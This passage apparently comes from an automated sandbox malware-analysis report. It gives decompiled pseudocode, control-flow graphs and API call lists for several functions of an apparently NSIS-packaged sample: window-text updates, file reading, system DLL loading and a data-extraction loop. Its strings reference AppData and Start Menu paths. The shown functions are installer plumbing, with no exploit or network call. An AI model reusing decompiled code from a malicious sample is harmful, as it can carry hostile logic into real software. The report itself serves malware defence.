                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: Ancone$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Roaming\Microsoft\Windows$Finishs
                                                        • API String ID: 1941528284-4097489003
                                                        • Opcode ID: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                        • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                                        • Opcode Fuzzy Hash: 3a324719c85a337398cc65979c64fae98dea917b83dd153e176ff01d71b6075b
                                                        • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004052B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 629 4052b0-4052c5 630 4052cb-4052dc 629->630 631 40537c-405380 629->631 632 4052e7-4052f3 lstrlenW 630->632 633 4052de-4052e2 call 40626e 630->633 635 405310-405314 632->635 636 4052f5-405305 lstrlenW 632->636 633->632 638 405323-405327 635->638 639 405316-40531d SetWindowTextW 635->639 636->631 637 405307-40530b lstrcatW 636->637 637->635 640 405329-40536b SendMessageW * 3 638->640 641 40536d-40536f 638->641 639->638 640->641 641->631 642 405371-405374 641->642 642->631
                                                        C-Code - Quality: 100%
                                                        			E004052B0(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x4291e4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2d4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040626E(_t38, 0, 0x4226c8, 0x4226c8, _a4);
					}
					_t27 = lstrlenW(0x4226c8);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x4291c8, 0x4226c8); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x4226c8;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x4226c8[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x4226c8, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                        0x004052b6
                                                        0x004052c0
                                                        0x004052c5
                                                        0x004052cb
                                                        0x004052d6
                                                        0x004052d9
                                                        0x004052dc
                                                        0x004052e2
                                                        0x004052e2
                                                        0x004052e8
                                                        0x004052f0
                                                        0x004052f3
                                                        0x00405310
                                                        0x00405314
                                                        0x0040531d
                                                        0x0040531d
                                                        0x00405327
                                                        0x00405330
                                                        0x0040533c
                                                        0x00405343
                                                        0x00405347
                                                        0x0040534a
                                                        0x0040535d
                                                        0x0040536b
                                                        0x0040536b
                                                        0x0040536f
                                                        0x00405371
                                                        0x00405374
                                                        0x00000000
                                                        0x00405374
                                                        0x004052f5
                                                        0x004052fd
                                                        0x00405305
                                                        0x0040530b
                                                        0x00000000
                                                        0x0040530b
                                                        0x00405305
                                                        0x004052f3
                                                        0x00405380

                                                        APIs
                                                        • lstrlenW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                        • lstrlenW.KERNEL32(00403233,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                        • lstrcatW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00403233), ref: 0040530B
                                                        • SetWindowTextW.USER32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040531D
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                        • String ID: Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade
                                                        • API String ID: 2531174081-3260086940
                                                        • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                        • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                                        • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                        • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 643 402644-40265d call 402c15 646 402663-40266a 643->646 647 402abf-402ac2 643->647 648 40266c 646->648 649 40266f-402672 646->649 650 402ac8-402ace 647->650 648->649 651 4027d6-4027de 649->651 652 402678-402687 call 4061ac 649->652 651->647 652->651 656 40268d 652->656 657 402693-402697 656->657 658 40272c-40272f 657->658 659 40269d-4026b8 ReadFile 657->659 660 402731-402734 658->660 661 402747-402757 call 405dc1 658->661 659->651 662 4026be-4026c3 659->662 660->661 663 402736-402741 call 405e1f 660->663 661->651 671 402759 661->671 662->651 665 4026c9-4026d7 662->665 663->651 663->661 668 402792-40279e call 406193 665->668 669 4026dd-4026ef MultiByteToWideChar 665->669 668->650 669->671 672 4026f1-4026f4 669->672 675 40275c-40275f 671->675 676 4026f6-402701 672->676 675->668 677 402761-402766 675->677 676->675 678 402703-402728 SetFilePointer MultiByteToWideChar 676->678 679 4027a3-4027a7 677->679 680 402768-40276d 677->680 678->676 681 40272a 678->681 682 4027c4-4027d0 SetFilePointer 679->682 683 4027a9-4027ad 679->683 680->679 684 40276f-402782 680->684 681->671 682->651 685 4027b5-4027c2 683->685 686 4027af-4027b3 683->686 684->651 687 402784-40278a 684->687 685->651 686->682 686->685 687->657 688 402790 687->688 688->651
                                                        C-Code - Quality: 83%
                                                        			E00402644(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C15(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t72;
				 *((intOrPtr*)(_t76 - 0x3c)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2a8 =  *0x42a2a8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x3c) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E004061AC(__ecx, __esi);
						if( *(__ebp - 0x3c) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405E1F( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405DC1( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x38;
									_push(__ebx);
									_push(__ebp - 0x38);
									__eax = 2;
									__ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x38 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x38);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406193( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x38;
														 *_t22 =  *(__ebp - 0x38) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, 1); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x38), __ebp - 0x44, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x3c));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                        0x00402644
                                                        0x00402646
                                                        0x00402649
                                                        0x0040264b
                                                        0x0040264e
                                                        0x00402653
                                                        0x00402657
                                                        0x0040265a
                                                        0x0040265d
                                                        0x00402abf
                                                        0x00402ac2
                                                        0x00402663
                                                        0x00402663
                                                        0x0040266a
                                                        0x0040266c
                                                        0x0040266c
                                                        0x00402672
                                                        0x004027d6
                                                        0x004027d6
                                                        0x004027d9
                                                        0x004027de
                                                        0x004015b6
                                                        0x00402885
                                                        0x00402885
                                                        0x00000000
                                                        0x00402678
                                                        0x00402679
                                                        0x00402684
                                                        0x00402687
                                                        0x00402693
                                                        0x00402697
                                                        0x0040272f
                                                        0x00402747
                                                        0x00402757
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040269d
                                                        0x0040269d
                                                        0x004026a0
                                                        0x004026a1
                                                        0x004026a4
                                                        0x004026a9
                                                        0x004026b0
                                                        0x004026b8
                                                        0x00000000
                                                        0x004026be
                                                        0x004026be
                                                        0x004026c3
                                                        0x00000000
                                                        0x004026c9
                                                        0x004026c9
                                                        0x004026d1
                                                        0x004026d4
                                                        0x004026d7
                                                        0x00402792
                                                        0x00402799
                                                        0x004026dd
                                                        0x004026e3
                                                        0x004026ef
                                                        0x00402759
                                                        0x00402759
                                                        0x004026f1
                                                        0x004026f1
                                                        0x004026f4
                                                        0x004026f6
                                                        0x004026f6
                                                        0x004026f6
                                                        0x004026f9
                                                        0x004026fe
                                                        0x00402701
                                                        0x00000000
                                                        0x00000000
                                                        0x00402703
                                                        0x00402706
                                                        0x0040270e
                                                        0x0040271a
                                                        0x00402728
                                                        0x00000000
                                                        0x0040272a
                                                        0x00000000
                                                        0x0040272a
                                                        0x00000000
                                                        0x00402728
                                                        0x004026f6
                                                        0x0040275c
                                                        0x0040275f
                                                        0x00000000
                                                        0x00402761
                                                        0x00402766
                                                        0x004027a7
                                                        0x004027c9
                                                        0x004027d0
                                                        0x004027b5
                                                        0x004027b5
                                                        0x004027b8
                                                        0x004027bb
                                                        0x004027be
                                                        0x004027be
                                                        0x00000000
                                                        0x0040276f
                                                        0x0040276f
                                                        0x00402772
                                                        0x00402775
                                                        0x0040277b
                                                        0x0040277f
                                                        0x00402782
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00402782
                                                        0x00402766
                                                        0x0040275f
                                                        0x004026d7
                                                        0x004026c3
                                                        0x004026b8
                                                        0x00000000
                                                        0x00402784
                                                        0x00402784
                                                        0x00402787
                                                        0x00402790
                                                        0x00000000
                                                        0x00402687
                                                        0x00402672
                                                        0x00402ac8
                                                        0x00402ace

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                        • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                          • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                        • String ID: 9
                                                        • API String ID: 163830602-2366072709
                                                        • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                        • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                                        • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                        • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 689 4065b6-4065d6 GetSystemDirectoryW 690 4065d8 689->690 691 4065da-4065dc 689->691 690->691 692 4065ed-4065ef 691->692 693 4065de-4065e7 691->693 694 4065f0-406623 wsprintfW LoadLibraryExW 692->694 693->692 695 4065e9-4065eb 693->695 695->694
                                                        C-Code - Quality: 100%
                                                        			E004065B6(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4); // executed
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                        0x004065cd
                                                        0x004065d6
                                                        0x004065d8
                                                        0x004065d8
                                                        0x004065dc
                                                        0x004065ef
                                                        0x004065e9
                                                        0x004065e9
                                                        0x004065e9
                                                        0x00406608
                                                        0x0040661c
                                                        0x00406623

                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                                        • wsprintfW.USER32 ref: 00406608
                                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%S.dll$UXTHEME$\
                                                        • API String ID: 2200240437-1946221925
                                                        • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                        • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                                        • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                        • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 696 4030fa-403111 697 403113 696->697 698 40311a-403122 696->698 697->698 699 403124 698->699 700 403129-40312e 698->700 699->700 701 403130-403139 call 4032f5 700->701 702 40313e-40314b call 4032df 700->702 701->702 706 403151-403155 702->706 707 403296 702->707 708 40315b-40317b GetTickCount call 406787 706->708 709 40327f-403281 706->709 710 403298-403299 707->710 720 4032d5 708->720 722 403181-403189 708->722 711 403283-403286 709->711 712 4032ca-4032ce 709->712 714 4032d8-4032dc 710->714 715 403288 711->715 716 40328b-403294 call 4032df 711->716 717 4032d0 712->717 718 40329b-4032a1 712->718 715->716 716->707 729 4032d2 716->729 717->720 723 4032a3 718->723 724 4032a6-4032b4 call 4032df 718->724 720->714 726 40318b 722->726 727 40318e-40319c call 4032df 722->727 723->724 724->707 733 4032b6-4032c2 call 405df0 724->733 726->727 727->707 735 4031a2-4031ab 727->735 729->720 738 4032c4-4032c7 733->738 739 40327b-40327d 733->739 737 4031b1-4031ce call 4067a7 735->737 742 4031d4-4031eb GetTickCount 737->742 743 403277-403279 737->743 738->712 739->710 744 403236-403238 742->744 745 4031ed-4031f5 742->745 743->710 748 40323a-40323e 744->748 749 40326b-40326f 744->749 746 4031f7-4031fb 745->746 747 4031fd-40322e MulDiv wsprintfW call 4052b0 745->747 746->744 746->747 754 403233 747->754 751 403240-403245 call 405df0 748->751 752 403253-403259 748->752 749->722 753 403275 749->753 757 40324a-40324c 751->757 756 40325f-403263 752->756 753->720 754->744 756->737 758 403269 756->758 757->739 759 40324e-403251 757->759 758->720 759->756
                                                        C-Code - Quality: 94%
                                                        			E004030FA(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				short _v148;
				void* _t59;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x410ea0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E004032F5( *0x42a278 + _t56);
				}
				if(E004032DF( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E004032DF(0x40cea0, _t91) == 0) {
									goto L33;
								} else {
									if(E00405DF0(_a8, 0x40cea0, _t91) == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E004032DF(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406787(0x40ce10);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E004032DF(0x40cea0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40ce28 = 0x40cea0;
						 *0x40ce2c = _t92;
						while(1) {
							 *0x40ce30 = _t81;
							 *0x40ce34 = _v12; // executed
							_t69 = E004067A7(0x40ce10); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40ce30; // 0x410ea0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E004052B0(0,  &_v148); // executed
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40ce30; // 0x410ea0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E00405DF0(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}





















                                                        0x00403105
                                                        0x00403109
                                                        0x0040310c
                                                        0x00403111
                                                        0x00403113
                                                        0x00403113
                                                        0x0040311a
                                                        0x0040311e
                                                        0x00403122
                                                        0x00403124
                                                        0x00403124
                                                        0x00403129
                                                        0x0040312e
                                                        0x00403139
                                                        0x00403139
                                                        0x0040314b
                                                        0x00403296
                                                        0x00403296
                                                        0x00000000
                                                        0x00403151
                                                        0x00403155
                                                        0x00403281
                                                        0x004032ca
                                                        0x0040329b
                                                        0x004032a1
                                                        0x004032a3
                                                        0x004032a3
                                                        0x004032b4
                                                        0x00000000
                                                        0x004032b6
                                                        0x004032c2
                                                        0x0040327b
                                                        0x0040327b
                                                        0x00403298
                                                        0x00403298
                                                        0x00000000
                                                        0x00403298
                                                        0x004032c4
                                                        0x004032c7
                                                        0x00000000
                                                        0x004032c7
                                                        0x004032b4
                                                        0x004032d5
                                                        0x00000000
                                                        0x004032d5
                                                        0x00403286
                                                        0x00403288
                                                        0x00403288
                                                        0x00403294
                                                        0x004032d2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
